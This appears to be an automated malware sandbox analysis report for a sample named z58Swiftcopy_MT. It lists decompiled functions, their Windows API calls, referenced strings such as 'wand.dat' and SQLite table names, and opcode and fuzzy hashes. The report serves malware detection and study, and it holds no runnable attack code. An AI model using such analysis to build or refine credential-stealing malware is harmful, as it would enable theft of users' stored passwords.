                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                      Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                      Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                      Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                      Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                      • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                      Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                      Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                                                                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,762CDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,762CDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
